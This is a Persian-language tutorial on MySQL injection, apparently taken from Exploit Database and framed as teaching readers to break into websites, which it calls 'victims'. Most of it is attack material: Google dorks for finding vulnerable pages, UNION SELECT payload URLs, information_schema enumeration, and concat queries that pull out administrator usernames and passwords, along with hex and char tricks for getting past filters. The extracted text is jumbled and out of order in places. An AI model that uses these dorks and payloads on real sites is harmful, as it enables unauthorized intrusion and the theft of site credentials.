1 - Exploit Database

نويسنده مقاله : ) پسر 1 چشم ( 

My Sql Injection 

آموزش کامل نفوذ به سايت های my sql 

Xinf3rnal 

نويسنده :



==>>> به نام خدای هکر ها



و حات : 

در اين مقاله قصد دارم شما را با يكي از بهترين و مفيد ترين و پر استفاده ترين 

روش از روش هاي نفوذ گري آشنا كنم.‏ قبل از هرچيز بايد بگم كه مطالب اين 

مقاله ممكنه براي افراد مبتدي سنگين باشه ولي با تمرين همه چيز حل ميشه و 

ازتون ميخوام كه هيچ مطلبي رو سرسري رد نكنيد و روي تمام مطالب تمرين 

كنيد در غير اين صورت مقاله رو ببنديد و يه شيفت ديليت و شما را به خير و ما 

را به سلامت 

... 

پس لطف كنيد تا اخر مقاله با من همراه باشيد 

Sql چيست ؟ 

Sql 

مخفف كلمه ي Structured query language به معني زبان پاسخ گويي 

ساخت يافته ميباشد 

. 

با Sql كارهاي بسيار زيادي ميتوان انجام داد ‏(كه در مقالات 

بعدي حتما آموزش خواهم داد)‏ و شما ميتوانيد به يك ديتابيس دسترسي داشته و 

اطلاعات آن را بازگرداني كنيد و اطلاعات به آن بدهيد و حذف كنيد و يا حتي 

آپديت كنيد و بسياري از كارهاي ديگر.‏ 

شما با ياد گيري اين آموزش ميتوانيد ميليون ها سايت را بزنيد كه تقريبا 

آنها آسيب پذير هستند در نتيجه با يك جستجوي كوچول ميتونيد يك قرباني 

نصيب خودتان كنيد 

90 درصد



در اين آموزش 

Step 1 

Sql Injection 

نباشه.همانطور كه ميدانيد مطالب براي 

اولين كار براي شروع پيدا كردن 

قصد دارم شما را با اين متد به صورت كامل آشنا كنم تا ديگه هيچ سوالي براي عزيزان 

My Sql هستند.‏ 

) Target هدف ( 

است كه شما براي اين كار ميتونيد اين چنين در گوگل سرچ كنيد 

توجه ) 

داشته باشيد شما در سايت هاي جستوجو گر هاي مختلف نميتوانيد هدفتان را پيدا كنيد و اين كار به بزرگي و پيشرفته بودن 

گوگل بر ميگردد 

1. site:.in inurl:id (inurl:.php?) 

2. inurl:'gov' and '.php' and 'pahe=' and 'id=' or 'news=' 

3. inurl:"news.php?id=" site:.no 

4. inurl:"id=" & in****:"Warning: mysql_fetch_assoc() 

5. inurl:(Page.(asp or php or...))?id= 

6. Site : .(Domains) Inurl:id (inurl:.(Php or asp)?) 

7. inurl:news.php?id= 

= 

: ( 

page 

) و هزاران Dorkِ ديگه كه در DvD آموزشي من قرار دارد)‏ 

مثلا اگر در inurl:news.php?id= بعد از ما يك عدد قرار دهيم در جستجوي گوگل تمام سايت هاي مورد نظر با همون 

باز ميشوند مثلا اگه عدد 12 را قرار دهيم تمام سايت هايي كه آخرشان news.php دارن به اين صورت ظاهر ميشوند : 

www.target.com/news.php?id=12 

پس پيشنهاد ميكنم كه عدد نزاريد چون امكان داره كه سايت هايي كه 12 صفحه دارن كم باشن و اين كار مشكل شما را در 

جستجو زياد ميكند 

همچنين براي Mssql وDomain هاي مختلف تغييراتي روي لينك ها انجام دهيد 

خب حالا فرض كنيد كه ما هدفمون رو پيدا كرديم و حالا ميخواييم بدونيم باگ داره يا نه ؟ 

براي اين كار من دو روش كاراكتر و منطقي رو به شما آموزش ميدم 

كاراكتر 

در اينجا من با اضافه كردن يك ' به آخر سايت Error مربوطه رو ميگيرم.‏ پس به اين صورت عمل ميكنم : 

www.target.com/news.php?id=12' 

منطقي 

در اين تست به آخر Url يك 0=1 And و 1=1 And اضافه ميكنم و اگر زماني 0=1 And رو اضافه كردم و صفحه ي 

سايت كامل و به صورت قبل باز نشد يا Error داد و ناقص بود يعني سايت آسيب پذير هست.‏ و با اضافه كردن 1=1 And 

هم صفحه بايد به صورت كامل لود بشه . 

در اين Step با Find كردن Target با استفاده از گوگل و چك كردن سايت واسه اين كه سايت باگ داره يا نه اشنا شديد.‏ 

در مراحل بعدي بيشتر با Inject كردن آشنا ميشويد 

. 

. 

: 

: 

.1 

.2



Step 2 

در اين قسمت ما ميخوايم تعداد column هاي هدف رو پيدا كنيم و براي اين منطور ما بايد از دستور 

order by [column test]-- 

: 

استفاده كنيم.‏ ما بايد از اين دستور در انتهاي Url سايتي كه از آن Error مربوطه رو گرفتيم استفاده كنيم و براي بار اول 

به جاي 

كنيد 

column test 

يك نامبر ميزاريم.اگر عددي كه گذاشتيم بعد از لود پيج Error گرفتيم يعني تعداد Column هاي 

ما كمتر از اين عدد است.بدين ترتيب نامبر رو كم ميكنيم تا پيج كامل لود بشه.‏ 

مثلا ما با نامبر 20 ارور گرفتيم ولي با نامبر 19 ارور نگرفتيم پس تعداد Column هاي ما 19 تا هست . مانند زير 

: 

www.target.com/news.php?id=12 order by 50-- 



error 

error 

no error 

معمولا Number Id رو با "-" ميخونند و نامبري ميذارن كه از تعداد تيبل ها بيشتر باشه.‏ پس بهتر است به صورت زير عمل 

: 

www.target.com/news.php?id=-999 order by 19-- 

در اين جا من در بين 

number] Order By [column از 

: 

در كل تفاوتي با هم ندارند و شما ميتوانيد از 

Space استفاده كردم ولي شما ميتوانيد به صورت هاي زير عمل كنيد 

www.target.com/news.php?id=-999+order+by+10-- 

www.target.com/news.php?id=-999/**/order/**/by/**/10/* 

+ 

استفاده كنيد



Step 3 

در درس های قبلی شما تونستيد Bug 

رو پيدا کرده و تعداد کلمن ها رو بشماريد.‏ در اين مرحله ميخوام شما را با دستور زير آشنا کنم 

: 

زماني كه ما با Order By تعداد كلمن ها رو شمرديم بايد بدونيم كه ميتونيم به چه كلمن هايي 

توسط اين دستور اين كار را انجام ميديم.‏ 

در اين دستور ما به جاي all number column 

باشيم بايد به صورت زير عمل كنيم 

union+select+[all number column]-- 

تعداد كلمن هايي كه شمرديم رو از 

) Inject 

1 ميزاريم.‏ 

تزريق ( كنيم.‏ و ما 

يعني اگر 19 كلمن داشته 

بعد ار اين كه ما از Union Select استفاده كرديم يك سري نامبر يا همون عدد روي پيج خواهند امد كه نامبر هاي كلمن 

هايي هستند كه ما ميتونيم به اونها تزريق كنيم يا كلمن هاي مورد نطر رو بكشيم بيرون كه در درس هاي بعدي با آن آشنا 

ميشويد 

نكته ي مهم اينه كه ما زماني از Union Select استفاده ميكنيم كه Order By جواب بده يعني اگر ما با Order By نتونيم 

كلمن ها رو بشناسيم توسط Union يكي يكي از يك شروع ميكنيم و نامبر رو بالا ميبريم تا جايي كه به ارور نرسيم 

الان فرض كنيد كه Oder By جواب نميده همينطور با Union ميريم جلو تا به تعداد مورد نظر برسيم مانند زير 

: 

و همينطور بالا ميبريم تا به عدد زير برسيم و سايت ديگه ارور نده و كلمن هاي قابل تزريق ظاهر بشن www.target.com/news.php?id=-999+and+1=0+union+all+select+1-- eroor 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1.2-- error 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1.2.3-- error 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1.2.3.4-- error 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1.2.3.4.5-- error 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1.2.3.4.5.6-- error 

) 

خورد كنه نه ؟ 

اين كار اعصاب 

: 

www.target.com/news.php?id=-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19- 

- 

( 


-



Step 4 

در اين مرحله ميخوام شما را با چند دستور براي تزريق به كلمن هاي قابل تزريق آشنا كنم.‏ دستوراتي كه دونه دونه 

Information رو از سايت بيرون ميكشه كه من با توضيح به شما آموزش ميدم:‏ 

version() 

اين دستور جهت به دست آوردن Version سايت My sql هست كه خيلي مهمه تا بفهميم تا قرباني ما از چه ورژني استفاده 

ميكنه چون ورژن 4 و ورژن 5 با هم متقاوت هستند كه در مراحل بعدي به صورت كامل براتون توضيح ميدم 

دستوز ورژن به اين صورت هم به كار ميرود 

دستور بعدي به صورت زير است 

اين دستور جهت برگرداندن نام 

يا 

@@version 

user() 

: 

: 

User هست 

و همچنين براي برگرداندن نام ديتا بيس از دستور زير استفاده ميكنيم 

database() 

: 

در بعضي از سايت ها به اين بر ميخوريد كه دستور version() جواب نميده كه بايد اون رو 

كار ميتوانيد از دستور زير استفاده كنيد 

Bypass كنيد.‏ 

: 

اين دستور كه Unhex ميكند براي دستورات بالا به شكل هاي زير به كار ميرود 

و همچنين اگر هيچ كدام از دستورات بالا اجرا نشد دستور ديگري وجود دارد به نام 

اين دستور هم 3 شكل كلي زير را دارد 

براي اين 

Unhex 

unhex(hex(version())) 

unhex(hex(user())) 

unhex(hex(database())) 

Convert 

convert(version() using latin1) 

convert(user() using latin1) 

convert(database() using latin1) 

: 

: 

: 

با استفاده از اين دستورات شما ميتوانيد ورژن مورد نظرتان را ببينيد.‏ 

(( خب سوال پيش مياد كه اين دستورات رو كجا بايد وارد كنيم ؟؟؟!!؟ 

عدد هايي روي صفحه ظاهر شدند مثل 

مانند زير 

يا 

12 كه شما ميتوانيد به جاي 

مثلا فرض كنيد كه با اين دستور 

: 

. 


- 

2 و 

: 

www.target.com/news.php?id=- 

999+and+1=0+union+all+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 

هر كدام كه دلتان خواست دستورات را وارد كنيد 


999+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--



يا 

و براي Unhex كردن 


999+and+1=0+union+all+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 

و همچنين حتي ميتونيد در هر دو كلمن دستورات رو وارد كنيد ) شايد سايت 1 كلمن يا حتي 4 تا كلمن برا تزريق هم بده 

از كار اين برنامه نويسان بي در و پيكر بعيد نيست 


999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,database(),13,14,15,16,17,18,19-- 

: 


999+and+1=0+union+all+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 

) 

(( 


999+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17,18,19-- 

Step 5 

در اين قسمت ميخوام شما را با Inj گرفتن در ورژن 5 به پايين به صورت كامل آشنا كنم.مبناي Inj در اين سري از ورژن ها 

حدس زدن هست و شما بايد نام Column و Table هاي مورد نظر خودتون رو حدس بزنيد.‏ 

اولين كار فراخواني Table هست كه با دستور From امكان پذير است و شكل كلي آن به صورت زير است 

كه به جاي 

بايد 

: 

-999+and+1=0+union+all+select[all column numbers]+from+[tabel name]-- 

: 

Table [table name] 

رو حدس بزنيم.‏ مثلا آن را به شكل زير مينويسيم 

999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin-- 

مثلا فرض كنيم من تيبل Admin رو حدس زدم ‏.و درست هم از آب در اومد و سايت كامل لود شد و هيچ اروري نگرفتيم در 

غير اين صورت بايد از تيبل هاي زير(‏ معمولا از تيبل هاي پر استفاده تست ميكنند)‏ استفاده كنيم.‏ مانند 

: 

admin , administrator , user , users , number , numbers , login , as_user , admin_user , admins 

در مرحله ي بعد ما بايد به حدس زدن كلمن ها بپردازيم كه آن ها را به جاي نامبر هاي قابل تزريق كه در سايت ظاهر 

ميشوند قرار ميدهيم مانند 

: 

user , user_name , user_admin , admin_user , username , login , pass , password , 

admin_pass 

در اينجا ما از Union استفاده ميكنيم تا كلمن هاي قابل تزريق رو پيدا كنيم.‏ 

مثلا ما تيبل رو حدس زديم كه Admin بود و همچنين Column هاي ما هم 

زير جايگزين ميكنيم 

و 

password هستند كه به صورت 


Username 

: 


999+and+1=0+union+all+select+1,username,3,4,5,6,7,8,9,10,11,password,13,14,15,16,17,18,19+from+admin-- 

و به جاي عدد 2 و 

12 كه در سايت بود يوزرنام و پسورد ادمين سايت رو به ما نشون ميده 

*** بعضي زمان ها امكان داره كه نام تيبل رو چيز غير قابل حدس داده باشند(برنامه نويسان به اصتلاح حرفه اي)‏ *** 

خب حالا فرض كنيد كه ميخواهيد يوزرنام و پسورد رو بدست بياريد ولي فقط يك كلمن براي تزريق داريد يعني روي 

سايت فقط يك عدد نوشته شد مثلا 9 اولا كه شما ميتوانيد دونه دونه يوزر و پسورد رو به دست بياوريد يعني اول يوزر نام 

رو بخوانيد و بعد پسورد رو ولي شما ميتوانيد به جاي اين كار كل يوزرنام و پسورد رو با هم در همون تيبل بيرون بكشيد 

كه در اين صورت بايد از دستور زير استفاده كنيد 

Concat 

:



توسط اين دستور ما ميتوانيم يوزر نام و پسورد رو در يك كلمن با هم بيرون بكشيم و فراخواني كنيم كه به صورت زير آن 

را فراخواني ميكنيم 

: 


999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,concat(username,password),10,11,12,13,14,15,16,17,18,19+from 

+admin-- 

ولي مشكلي كه اينجا پيش مياد اين است كه يوزر نام و پسورد با هم نوشته ميشوند و شما نميدانيد كه يوزر نام كدام است 

مثلا ممكنه كه يوزر Iman و پسورد 1Eye باشد در اين صورت به جاي عدد 9 اين چنين نوشته ميشود : 

ما براي جداسازي و رفع اين مشكل دو راه پيش رو داريم.‏ روش اول روش 

است كه معادل hex يعني : است كه ما ميتوانيم 

Iman1Eye 

Hex 

= 0X 

= 3a 

معادل شروع شدن Hex است 

معادل كاراكتر 

كه در نهايت به شكل زير خروجي ميگيريم : 

: است 

كاراكتر بعدي كاراكتر زير است 

يوزر نام و پسورد رو با هم جدا كنيم به شكل زير : 

concat(username,0x3a,password) 

Iman:1Eye 

char() 

: 

كه معادل كد ascii هست كه به شكل زير مينويسيم 

concat(username,char(58),password) 

: 

= 58 

معادل كد اسكي 

group_concat() 

: است 

همانند Concat هست با اين تفاوت كه اگر سايت چندين ادمين داشته باشد همه رو بيرون ميكشد 

اين دستور هم همانند Concat هست با اين تفاوت كه اگر ما چند كلمن رو بخواهيم بيرون بكشيم لازم نيست كه 

بين تمام كلمن هايي كه ميخواهيم بيرون بكشيم بنويسيم يك بار اول مينويسيم بعد خودش بين همه كاراكتر 

گذاشت كه براي اين كار به صورت زير عمل ميكنيم 

concat_ws() 

0x3a رو 

: خواهد 

: 

concat_ws(0x3a,username,password,email,id)

Step 6 


نويسنده مقاله 

خب دوستان در اين بخش ميخوام بهتون نحوه ي حمله به سايت هاي ورژن 5 به بالا رو آموزش بدم.‏ 

: ) پسر 1 چشم ( 

در My sql 5 به بالا 

امكان بيرون كشيدن نام همه ي تيبل ها و كلمن ها وجود دارد و نيازي به حدس زدن ندارد كه اين نوع كار هكر را آسان تر 

خواهد كرد و مسلما از ورژن 5 به پايين آسان تر است.شكل كلي 

يعني براي بيرون كشيدن نام تمامي تيبل ها 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10+from+information_schema.[tables or columns] 

و براي بيرون كشيدن نام تمامي كلمن ها ازدستور زير استفاده ميكنيم 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10+from+information_schema.tables 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10+from+information_schema.columns 

ما توسط information_schema ميخواهييم information رو بيرون بكشيم.‏ Information_schema يك كاتالوگ از نام تمامي 

تيبل ها و كلمن ها است.‏ 

حالا فرض ميكنيم كه يك قرباني با ورژن 5 داريم و سايت يك عدد داد مثل 8 كه در اين صورت اولين كار بيرون كشيدن 

تيبل هاست كه به صورت زير عمل ميكنيم 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,table_name,9,10+from+information_schema.tables-- 

كه ما به جاي 8 دستور Table_name رو نوشتيم تا نام اولين تيبل رو به ما نشون بده و همينطور اگه بخواهيم 

Column_name رو ببينيم به صورت زير عمل ميكنيم 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,column_name,9,10+from+information_schema.tables-- 

و به همين صورت ما نام كلمن ها رو بيرون كشيديم و به جاي 8 ما Column_name 

نشون بده.‏ 

رو نوشتيم تا اولين نام رو به ما 

و براي اين كه همه ي Table_name ها و Column_name ها رو به صورت ليست در سايت بيرون بكشيم بايد از دستور 

Group_concat استفاده كنيم كه 2 شكل كلي آن به صورت زير است 

: 

-999+and+1=0+union+all+select+1,2,3,4 ,5,6,7, group_concat(table_name),9,10+from+information_schema.tables-- 

: 

-999+and+1=0+union+all+select+1,2,3,4 ,5,6,7, group_concat(column_name),9,10+from+information_schema.columns-- 

و براي تمامي كلمن ها 

در 2 شكل بالا يك ليست از نام تمامي تيبل ها و كلمن ها به ما نشون ميده كه بعضي ازتيبل و كلمن هاي ما مربوط به 

Schema ميباشند كه استفاده نميشوند و ما بايد به دنبال تيبل و كلمن هايي بگرديم كه در انها Information و اطلاعات 

مورد نظر ما وجود دارد.‏ 

حالا امكان داره بعد از ليست كردن تيبل و كلمن ها به تيبل مورد نظر دست پيدا نكنيم و براي رفع اين مشكل ميتوانيم از 

دستور 

limit offset 

و دستور شرطي where استفاده كنيم كه در درس هاي بعدي به صورت كامل آموزش خواهم داد.‏ 

حالا فرض كنيد كه تمامي تيبل ها و كلمن ها را روي يك سايت بيرون كشيديم كه تيبل مورد نظر ما Amin_user بود و 

كلمن هاي ما هم Username و Password هستند پس ما به صورت زير عمل ميكنيم : ‏(كلمن قابل تزريق ما 4 است 

براي بيرون كشيدن نام يوزر و از دستور زير 

( 

-999+and+1=0+union+all+select+1,2,3,username,5,6,7,8,9,10+from+admin_user-- 

: 

-999+and+1=0+union+all+select+1,2,3,password,5,6,7,8,9,10+from+admin_user-- 

براي بيرون كشيدن نام پسورد هست كه براي به دست آوردن هر دو با هم به صورت زير عمل ميكنيم 

: 

-999+and+1=0+union+all+select+1,2,3,group_concat(username,0x3a,password)+from+admin_user-- 

Step 7 

در اين بخش ياد ميگيريد كه چگونه ميتونيد نام تيبل و كلمن رو توسط 

Limit و 

Offset بيرون بكشيد.‏ توسط 

Offset ميتونيد دونه دونه نام Table_name ها و Column_name ها رو بيرون كشيد.‏ شكل كلي:‏ 

Limit و



- 

999+and+1=0+union+all+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+limit+1+offset 

+1-- 

: 

- 

999+and+1=0+union+all+select+1,2,3,4,column_name,6,7,8,9,10+from+information_schema.columns+limit+1+o 

ffset+1-- 

output 

Limit 

: 

Offset و Limit 

- 

999+and+1=0+union+all+select+1,2,3,4,table_name_6,7,8,9,10+from_information_schema.tables+limit+1+offset 

و براي كلمن ها 

دستور براي محدود كردن 

در شكل زير ما توسط 

مورد نظر به كار ميرود . 

اولين Table_name رو توسط اين دستور 

+1-- 

و اولين Column_name رو توسط اين دستور:‏ 

-999+and+1=0+union+all+select+1,2,3,4,column_name,6,7,8,9,10+information_schema.columns+limit+1+offset+1-- 

بيرون ميكشيم.‏ اما براي اينكه ما به ترتيب تمامي نام ها رو بيرون بكشيم بايد به Number Offset يكي اضافه كنيم يعني 

براي نام هاي بعدي به شكل زير مينويسيم 

. 

+limit+1+offset+2-- 




Limit 

: 

و همينطور ادامه ميديم تا به تيبل و كلمن هاي مورد نظر خودمون برسيم.‏ معمولا زماني به كار ميرود كه ما نتونيم 

يا همون ليست كردن تيبل ها به تيبل مورد نظر برسيم.‏ 

توسط 

Limit به يك شكل ديگر هم به كار ميرود كه من يك اشاره ي كوچيك بهش ميكنم.‏ شكل كلي دستور 

Group_concat 

: 

-999+and+1=0+union+all+select+1,2,3,4,column_name,6,7,8,9,10+information_schema.columns+limit+1,1-- 

كه در اين دستور بايد به شكل زير تغييرات را انجام بدهيم : 

+limit+2,1-- 

+limit+3,1-- 

+limit+4,1-- 

+limit+5,1--


Step 8 


در اين بخش ميخوايم دستور Where رو با هم كار كنيم 

. 

Where يك دستور شرطي است كه كلي كار رو آسون كرده.‏ براي 

اين كه ما بعد از بدست آوردن Table_name مورد نظر بتونيم كلمن هاي درخواستي رو محدود كنيم از 

ميكنيم . Queryً رو به صورتي ميديم كه Output ما تنها كلمن هاي تيبل مورد نظر باشد 

شكل كلي دستور 

Where استفاده 

: 

union+all+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name='[table_name 

]'-- 

فرض كنيم در يك سايت Tbale_name ما Admin هست و ما ميخواهيم كلمن هاي مربوط به آون رو بيرون بكشيم در اين 

صورت به شكل زير عمل ميكنيم : 

union+all+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name='admin'-- 

نكته ي ديگري وجود داره اينه كه امكان داره با ارور مواجه بشيم كه دليل اون On بودن Magic quote هست ولي هيچ 

مشكل و هيچ چيزي نميتونه چلوي نفوذ يك هكر رو بگيره و شما زماني كه با اين مشكل مواجه شديد ميتونيد با 

در دي وي دي آموزشي من به صورت كامل توضيح داده شده است 

Char يا 

( 

Hex كردن table_name اون رو Bypass كنيد )


Step 9 


در اين بخش ميخوام بهتون آموزش بدم كه چطور ميشه توسط نام Database تيبل هاي مربوطه ي همون ديتابيس رو 

بيرون بكشيم كه كار رو نسبت به 

Limit و 

Offset آسون تر ميكنه.‏ 

براي اين كار اول بايد نام ديتابيس تيبل رو بيرون بكشيم . شكل كلي 

در صورتي هم كه به محدوديت بر خورديد ميتوانيد به شكل زير عمل كنيد 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,database(),9,10,11,12-- 

: 

-999+and+1=0+union+all+select+1,2,3,4,5,6,7,unhex(hex(database())),9,10,11,12-- 

حالا ما ميخواييم توسط دستور Where و نام ديتا بيس تيبل هاي مورد نظر رو به دست بياريم.‏ شكل كلي دستور : 

- 

999+and+1=0+union+all+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12+from+information_schema.tables+wh 

ere+table_schema='[database name]'-- 

و در صورتي هم كه به محدوديت برخورديد بايد نام ديتابيس رو Char يا Hex 

كنيد.‏ 

I Am Iranian Crazy >> 1 EYe



توضيحات مفهومي 

Group_concat() 

Table_name 

Column_name 

0x3a 

Information_schema 

limit 

offset 

اين دستور براي اين است كه دسته اي از 

ركورد ها رو بررسي كند 

اي ن عب ارت ن ام فيل دي اس ت در ج دول 

information_schema كه نام ساير جدول 

در آن نگهداري ميشوند و به كمك اين عبارت 

ميتوانيم نام جدولي كه در آن دسترسي ها و 

نام كاربري ها وجود دارد را ببينيم 

اين دستور نيز مانند table_name فيلدي 

در جدول information_schema است كه 

در آن نام ستون ها نگه داري ميشوند و با 

كمك اين عبارت ميتوانيم نام فيلد هاي يوزر 

نام وپسورد را بيابيم 

اين عبارت كد 

hex كاراكتر : 

است و براي 

تفكيك مقادير خروجي از ديتابيس استفاده 

ميشود.‏ 

اين عبارت نام جدولي است كه روي هر 

هاستي كه از my sql 5 استفاده ميكند وجود 

دارد.‏ در اين ديتابيس اطلاعات مربوط به ساير 

ديتابيس هايي كه كاربر ميسازد ذخيره 

ميشود ‏.اطلاعاتي از قبيل نام جدول و نام 

ركورد و حتي نام ديتابيس ها.‏ ما ميتوانيم با 

گذاشتن يك query ساده از اين ديتابيس 

اطلاعاتي كه براي ما سود مند هست رو 

استخراج كنيم 

اين دستور sql براي محدود كردن نمايش 

اطلاعات بر مبناي تعداد ركورد استفاده 

ميشود 

كار اين دستور قدم زدن در بين ركورد ها 

است.‏ 

Limit 1 offset 1 يعني نمايش اولين ركورد و 

limit 1 offset 2 يعني نمايش دومين ركورد 

است.‏ دستور offset تعداد ركورد ها رو از 

ضفر شروع ميكند

نويسنده مقاله : ) چشم پسر ( 1 

My Sql Injection

1 - Exploit Database

Create successful ePaper yourself

Delete template?

Save as template?